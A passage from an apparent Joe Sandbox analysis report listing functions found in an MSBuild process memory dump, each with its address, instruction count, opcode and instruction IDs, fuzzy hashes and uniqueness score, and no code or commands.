                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f728f1acd20e38a0f55a313d7580fda8598def61d308428e0541767ce322e66
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A31A9726093118FE320DF19C844B6BBBE9FF98708F5449AEE98497291D370EC04CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013D7190 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                                                                                                  • Instruction ID: 156996202a41defdce43fb2dd0edef8c3acfc7a0f1a02fc00fda910682a1aaa4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58315A76604206CFC710CF2CD480956FBF6FF99318B2586A9E9589B315E730ED06CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9dc4240cd6e30ab0c1beae4257ed654aaa807e120260a3c34ad19c10978c23b1
                                                                                                                                                                                                                                                                  • Instruction ID: 75e82d2f43b7783ecd27165529448045a674d985ada5c2453e871e73628ed4aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dc4240cd6e30ab0c1beae4257ed654aaa807e120260a3c34ad19c10978c23b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431E232B006059FDB25DFB8C981A6EBBFAEB80308F548429D145E3694D770DD41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013892C5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                                                                                                                                  • Instruction ID: 85a0f17c1e53ea1a11e8e4278c92759aaae9c0e1548ab3e8ef84a4ccee241c14
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7316BB160835A8FCB02EF18D840A5B7BE9FF99758F01056AF851973A1D770DD05CBA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 252c9760668fac9359fd75097bb46ca1148c613df6b5f510d150d737b2c3401b
                                                                                                                                                                                                                                                                  • Instruction ID: 823c4e2028d151fdabb6b54080fca85aa3d69ed82c816880e185d719a8d7b369
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 252c9760668fac9359fd75097bb46ca1148c613df6b5f510d150d737b2c3401b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E93139B25002019BDB31AF6CDC41B697BB4AF5031CF9581A9ED499B382DA74D986CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                                                  • Instruction ID: 1a0196e25dc9fc4bd34c36b63f4c39303b9b53e67be2196f8df85fab6b8956d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA213036600652B6CF15ABA99C80AFBBBB4EFE4714F40802FFAD597661E634DD40C360
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 237ee10103f8152cb921d817814a42db928a1a177bca40cf8c3c8f67774be500
                                                                                                                                                                                                                                                                  • Instruction ID: 31d14078e90830d11795172d4ca7f7972141d91f345f070ae2ca09553e923944
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 237ee10103f8152cb921d817814a42db928a1a177bca40cf8c3c8f67774be500
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B318431A4152C9BDF31DB18CC41FEE77B9EB15758F0101F5E655AB290D6789E808F90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B4588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                                                  • Instruction ID: 97d67cb727f15cef55d4952f1efc7aa7f2887d7c3ef5fc5776770253ecea6b59
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87217431A00609EBCB15CF58C5C0ADEBBB5FF48728F108469EE169F642E671EE458B54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014503E6 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e8bc016b17228775f0b7d0be3de67e572715fe68887a836cc951aa6b32232ca6
                                                                                                                                                                                                                                                                  • Instruction ID: 22679322e478a79c52ed9e3789eb0fc5df07373560532ad85eee814a74a503b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8bc016b17228775f0b7d0be3de67e572715fe68887a836cc951aa6b32232ca6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D316175B0011AAFDB54CFA4D994AAFBBB9FB88314F05412AF909E7211DB306D04CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                                                  • Instruction ID: db6d3aa3c9a3cb2b6af009e155ebdbad212299984d83ed363c60813d189ceb30
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE317C31600609EFE721CFA9C884F6AB7B9FF85358F1045B9E5529B690E734EE01CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BD530 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2c93818418311aed21a4c2bb2e21581464f54f36df27780e2207fdb03060fcd2
                                                                                                                                                                                                                                                                  • Instruction ID: b7313d94277654bf33c7746191b5b7ee519ceb813793516b79b024ef5dc002b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c93818418311aed21a4c2bb2e21581464f54f36df27780e2207fdb03060fcd2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 792105B1505A059BDB20EBBCD980B5777E9AF6465CF41082AFB08D76A0FB30D804CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01450591 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: cf77f796eab7e03a588996e7799edcc6227bdd660afeda9f729f8d5976e9581b
                                                                                                                                                                                                                                                                  • Instruction ID: 28c87ffca184db73675bcf7d5a54fc7c4b8d1d5641d6b6681dade8fd90b51486
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf77f796eab7e03a588996e7799edcc6227bdd660afeda9f729f8d5976e9581b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6621A2366102098FD768CE2DD8806B777A2EF94314F59447AED09DB266D770F846C760
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AF32A Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                                                                                                                                                  • Instruction ID: decc1e128056ab25690d32bf7b6d33352fcd608199aad0bbc2a222033a8b3524
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF21D1722006059FD719DF19C440B6ABBEDEF95369F55416DE10ACB390EB70EC01CB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0140019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5c822c7749ecce8a2938ddd3f3de1302fead3bbf9a571dbf35bca6d220812f21
                                                                                                                                                                                                                                                                  • Instruction ID: f2ff43e873baf5ef6fb84e08ddd69b3d6076f7a6f64836a30bb1d1daea8cfb9a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c822c7749ecce8a2938ddd3f3de1302fead3bbf9a571dbf35bca6d220812f21
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6821AC71600645AFDB16DB6DC840F6AB7B8FF48784F14406AF908DB7A0D635ED41CBA8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014271F9 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 384644633c6b9105d23ad1d5fe877f6f99dc4cbfb7167cccaf9d6773d7cc8bc2
                                                                                                                                                                                                                                                                  • Instruction ID: 71b7b0ca669bedc49f3175f9cf636ed9c22a5b5120971a3e751fed8ccbec21df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384644633c6b9105d23ad1d5fe877f6f99dc4cbfb7167cccaf9d6773d7cc8bc2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6214D309047618BC321DF29844076BBBE9AFF6315F51491EF8A593261CB30988587A1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01400283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 74808c18459e4e22cef9b44d533f96e60e22fd6a9a3613efbf6f75537919ae90
                                                                                                                                                                                                                                                                  • Instruction ID: e7e454574c894e0339aa5e5741743fcc35da77f7fe9658a31ee1db9b6258facc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74808c18459e4e22cef9b44d533f96e60e22fd6a9a3613efbf6f75537919ae90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B121A1B25042469BDB12EF6EC844B6BBBDCAF91684F08446ABD80872A1D734DA05C6A1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013FD0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                                                                                                  • Instruction ID: a007a5db434b7dfc2a80220186f70acc41866c49eb4a9cf480a3f36461ac473f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3321D472644705ABD3119F1CCC45B5BBBA4FF88768F00022EFA499B3A0D734EC0087A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014501AA Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9664a43c64529e1e3eafa1d9b1d90221416f3704f597a6d3270e29902cb44ccc
                                                                                                                                                                                                                                                                  • Instruction ID: 42103be9933f58889269750ac3f0c3d9e050ebe144580639dc09bd4f23980fc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9664a43c64529e1e3eafa1d9b1d90221416f3704f597a6d3270e29902cb44ccc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821E4A12042504FD755CF1A88B44B6FFE6EFC662574B81E6E884DF787C934981ACBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BA30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e2f8ccb46d7426d42f0f4628f36c04e5e197781fea1c6e951ce1930477a5db01
                                                                                                                                                                                                                                                                  • Instruction ID: 6e0628d85a0397dd86556657cb3042de63d8294e582758db3803f566f9bee87a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2f8ccb46d7426d42f0f4628f36c04e5e197781fea1c6e951ce1930477a5db01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A216875201A41DBCB29DF29C941B96B7F5AF48B08F24846DA609CBB61E371E842CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A15A9 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                                                                                                  • Instruction ID: 9a17db6a00a49595463e2d4283255ad8260ff0f8bb76a7a52023afed60fcf828
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0721F07160479ADFEB228BADC948B217BE9EF54358F0900A1ED459B7D2EB34DC40CA90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144EE26 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6f9dd912068730f79463bb8b6c1441f3b63cd610447f612271772d6ec0993f24
                                                                                                                                                                                                                                                                  • Instruction ID: 203542873b61df3add964c597ad09629d3a3955fb2665e07f590481c5d3a31a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f9dd912068730f79463bb8b6c1441f3b63cd610447f612271772d6ec0993f24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7121A233A104129B9B28CB3CC904476F7E6FFCC32436A427AD516EB664D674B9118684
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B0124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                                                                  • Instruction ID: 39219cc9a649bd94d3bf7e039565c10d83acc32d852c31d6711a23996fa0553d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9119076601605EFD72A9A58C881FDBBBB9EB80758F104029F7059F590E671ED44CB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013880E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
